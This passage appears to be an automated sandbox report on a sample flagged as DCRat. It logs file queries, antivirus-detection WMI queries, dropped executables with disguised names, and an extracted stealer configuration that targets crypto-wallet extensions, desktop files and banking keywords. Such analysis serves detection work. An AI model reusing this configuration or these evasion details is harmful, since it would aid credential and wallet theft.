Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: fDTPlvsGfH.exe, type: SAMPLE
Source: Yara match File source: 0.0.fDTPlvsGfH.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1623414051.0000000000062000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fDTPlvsGfH.exe PID: 6168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe PID: 7744, type: MEMORYSTR
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: fDTPlvsGfH.exe, 00000000.00000002.1670534980.0000000002681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"Desktop|{SYSTEMDRIVE}/Users/{USERNAME}/Desktop/|*.txt;*.cs;*.lua;*.asi;*.json;*.ini;*.word;*.xlsx;*.jpg|1000|t","_1":"Group name"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: fDTPlvsGfH.exe, 00000000.00000002.1670534980.0000000002681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"Desktop|{SYSTEMDRIVE}/Users/{USERNAME}/Desktop/|*.txt;*.cs;*.lua;*.asi;*.json;*.ini;*.word;*.xlsx;*.jpg|1000|t","_1":"Group name"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: powershell.exe, 00000001.00000002.2444317338.000001BD90075000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
